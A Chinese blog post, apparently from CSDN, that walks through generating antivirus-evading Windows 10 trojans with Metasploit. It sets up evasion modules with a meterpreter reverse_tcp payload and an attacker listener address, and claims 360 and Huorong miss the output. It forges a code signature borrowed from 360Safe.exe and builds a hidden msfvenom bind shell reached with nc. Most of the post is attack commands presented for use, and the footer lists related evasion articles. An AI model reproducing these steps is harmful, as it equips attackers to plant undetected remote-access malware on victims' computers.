kaliwin10免杀

最新推荐文章于 2024-05-29 22:21:42 发布
最新推荐文章于 2024-05-29 22:21:42 发布
阅读量475 收藏 2
点赞数
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h1825819493/article/details/131129719
版权

evasion是msf6中新增加的一个免杀模块

后面的四个模块可以不用配置环境

使用模块五

use evasion/windows/process_herpaderping
#选择模块五

set lhost 172.20.201.15
#设置本机的监听地址

exploit
#生成免杀马
#[+] vKn.exe stored at /root/.msf4/local/vKn.exe   这是生成的路径提示,直接在root下面进行查看时看不到的,这是因为这个是隐藏文件

在查看配置的时候Required中写yes的都是需要进行配置的,有的是默认配置好的,但是也可以进行更改

使用模块六

生成win10免杀马,用360和火绒是识别不出来的(不能再win11下运行)

use evasion/windows/syscall_inject
#使用模块六
#可以看到自动帮我们使用了payload [*] Using configured payload windows/x64/meterpreter/reverse_tcp

set lhost 172.20.201.15
#设置一下攻击机的ip地址

set filename 1234.exe
#设置一下生成的文件名

run
#[+] 1234.exe stored at /root/.msf4/local/1234.exe 生成文件所在位置

对生成的马进行签名 。新建一个文件夹,把签名用的python程序放在文件夹,在把生成的马放进去

./hack.py -i /root/111/360Safe.exe -t /root/111/1234.exe -o 12345.exe
-i 指定盗用来签名的程序
-t 指定我们的马
-o 输出为什么

windows隐藏绑定外壳

msfvenom -p windows/shell_hidden_bind_tcp AHOST=192.168.0.123 LPORT=3333 -f exe > hide.exe
#nc的正向连接shell
#受害主机扫描3333的端口的时候是关闭的,当我们去扫描连接他的时候就是开启的

nc 192.168.0.101 3333
#使用nc直接正向连接马

偷吃"游"的阿彪
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
kali免杀工具Veil Evasion
scholar_1的博客
07-04 3055
首先,介绍一下Veil Evasion,Veil Evasion是linux的一款免杀工具,是一个用 Python 编写的免杀框架,用来生成MSF的Payload,能绕过常见的杀毒软件,它可以将任意脚本或一段 Shellcode 转换成 Windows 可执行文件,从而逃避常见防病毒产品的检测。关于MSF,它就是一个漏洞框架(全称:The Metasploit Framework),嗯,免费,通过这个框架,我们可以很容易的对于软件的漏洞进行攻击。它本身带有几千个漏洞攻击工具。......
免杀测试】Kali之Metasploit几款工具免杀练习
小司机的奥拓
12-25 1423
余磊不知攻,焉知防。作为渗透测试攻城狮,实战之前要做大量的攻防练习。一般黑客拿到主机的shell之后,需要留后门方便进行下一步的渗透。普通的木马已经很容易被查杀工具识别,这时就催生出了免杀技术来绕过杀毒软件。下面就尝试测试有关工具的免杀效果,三款工具为,shellter,Veil, Avet01shellterShellter采用了动态Shellcode注入来实现免杀的效果,当用户打开被植入后门的软件时,只有触发一定的操作才会启动后门。它是生成一个dll文件再将其注入到任意一个文件中运行。
kali制作木马并使用shellter免杀工具来实现更低的查杀率
勤能补拙
05-29 821
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀
kali-漏洞利用】(3.4)免杀Payload 生成工具(上):Veil安装、启动、Can‘t find the WINE profile问题
08-06 1399
kali-漏洞利用】免杀veil:安装、启动、问题
Windows下基础免杀技术
MachineGunJoe666
09-04 1655
例如,CS可以直接生成各种格式的shellcode。
Windows免杀:服务后门
zcy5157912的博客
09-28 368
通过给自身传递不同的参数来达到不同的行为,用服务的自启动代替应用程序的自启动
永恒之蓝复现kaliwin7
最新发布
07-19
永恒之蓝复现kaliwin7
Kali-linux免杀Payload生成工具Veil
2301_77162959的博客
05-18 967
Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件。本节将介绍Veil工具的安装及使用。
【网络安全】简单的免杀方法(基本知识)
A1_3_9_7的博客
01-24 1342
什么是免杀免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti -AntiVirus(简写Virus AV),逐字翻译为“ 反-反病毒”,翻译为“反杀毒技术”。 通俗点讲,也就是一个被杀软报毒的PE文 件,经过一系列处理后,使杀软不认为他 是一个病毒或木马。
利用kali Linux使用meterpreter制作免杀木马测试入侵windows电脑
WuHao的博客
10-26 5674
前言:常规使用meterpreter制作木马时会被各大杀毒软件所拦截,固本文介绍一下利用meterpreter下的Venom制作免杀木马。 首先安装Venom Venon克隆地址:https://github.com/r00t-3xp10it/venom tar.gz OR zip OR git clone 2.赋予文件可执行权限: cd venom-main sudo chmod -R +x *.sh 3.安装依赖关系包: cd aux sudo ./setup.sh 4.运行 sudo.
kali linux 源码免杀,shellcode超级免杀
weixin_35718351的博客
05-12 1648
shellcode超级免杀作者声明: 本文章属于作者原创,不能转载,违反网络安全法自己承担.这里只供学习使用.日期: 2019-12-31我试过了电脑管家,火绒安全,McAfee,360, 但只有360使用手动云查杀时木马才能查出来 (目前所有软件都无法查杀!!!!! 2020-1-2) 从2019-12-29日早上起,我向我的PE-tools工具里写了一个功能,就是shellcode注入功能,写...
学习记录:内网穿透+ShellCode+C++语言二次编译 免杀绕过火绒 渗透Win10提取密码
qq_60709081的博客
06-24 1521
攻击机:Kali (虚拟机)靶机: Windows 10 22H2 版本 10.0.19045(物理机)工具:MSF,VS,花生壳通过C++二次编译制作免杀木马,绕过火绒检测,实现对靶机的控制,windows本地提权,获取并破解用户密码。今天又进步了一点点,之后打算去打基础了,一步一步来。但毕竟做任何事都要有些动力的,做一个ScriptsKids反倒可以增加自己的兴趣和动力呢。🎉✨免责声明:本文仅作学习、深研而用,若有犯罪行为,一切后果自负,与本文作者无关。
关于永恒之蓝漏洞和生成后门木马以及加壳免杀的学习过程以及一些经验的分享
m0_74805513的博客
07-20 1232
首先这个文章是重点针对于加壳免杀的一个文章如果你是想在这个地方重点学习永恒之蓝或者利用msfvenom来生成后门木马,可以私信我给你们发word版的笔记,由于我也是一个新手,如果有不对的地方,希望有大佬可以指出。 那么下面进入正题第一步加壳工具的安装和使用方法: 第一步确定你所需要的版本,这里的加壳工具shellter有两个版本第一个版本是kali版安装步骤如下: apt-get update //更新 apt-get install shellter //在线安装 在kali上使用
免杀〗.net程序一键免杀Win10 20H2 Defender
K8哥哥
12-18 1687
WIN10更新至最新版20H2发现,查杀能力比以前强了不少,特别是针对CS加载.NET程序集或NIM加载.NET的查杀,毕竟你要调用的函数微软很了解,它想拦截想杀还是比较容易的。但是不知道大家有没听说过一个故事“微软的编程工具的开发工程师,编写程序时,也需要查阅文档”,说明什么?微软系统的API很多,是微软写的没错,但又不是一个人自己写的,就算是一个人自己写的,功能那么多,他也根本记不起,用到自己的东西也要查阅文档,就像我用Ladon有时也要查阅文档,这很正常,因为我写过的工具或功能太多,有些久不用,甚至都
简单的Msf木马免杀
weixin_47948655的博客
08-12 1123
简单加密shellcode与加载器实现msf木马免杀
Kali生成windows木马程序
qq_51950323的博客
09-07 9701
此文章为kali生成windows木马程序,进行的后渗透测试。此操作仅供虚拟机测试,请勿使用于非法途径。
msf 渗透基础篇(基本命令)
失心少年
07-30 2454
kali 为例,几个关键路径,熟悉一下,为了更方便的查找。
exe文件,后门免杀的制作学习笔记
我的学习笔记
02-28 3235
引用原文!!注:本文技术非原创,转载请直接对原文转载,请不要对本文打赏等,本文为学习笔记,禁止由本文产生任何盈利行为。需要(Framework),一般Windows环境都有,C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exemsfvenom -p windows/meterpreter/revers...
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

偷吃"游"的阿彪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值